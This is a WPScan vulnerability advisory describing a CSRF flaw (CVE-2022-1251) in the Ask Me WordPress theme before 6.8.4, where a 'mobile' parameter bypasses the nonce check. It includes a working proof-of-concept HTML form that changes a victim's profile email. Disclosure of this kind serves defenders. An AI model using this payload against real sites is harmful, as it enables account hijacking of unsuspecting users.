WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Ask Me < 6.8.4 - CSRF in Edit Profile

Description

The theme does not perform nonce checks when processing POST requests to the Edit Profile page, allowing an attacker to trick a user to change their profile information by sending a crafted request. 

Version 6.8.2 introduced nonce checks, but these are bypassed when the 'mobile' parameter is passed as well.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/edit-profile/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nickname" value="Evil Ottar" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="user_action" value="edit_profile" />

      <!-- Version 6.8.2 introduces a nonce, but checking it is bypassed if 'mobile' is not empty. -->
      <input type="hidden" name="mobile" value="1" />

      <input type="submit" value="Save" />
    </form>
  </body>
</html>

Affects Themes

ask-me
Fixed in version 6.8.4

References

CVE
CVE-2022-1251

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

WPScan team

Submitter

Harald Eilertsen

Submitter website
https://wpscan.com
Verified

Yes

WPVDB ID
34b3fc35-381a-4bd7-87e3-f1ef0a15a349

Timeline

Publicly Published

2022-08-01 (about 10 months ago)

Added

2022-08-01 (about 10 months ago)

Last Updated

2023-04-30 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin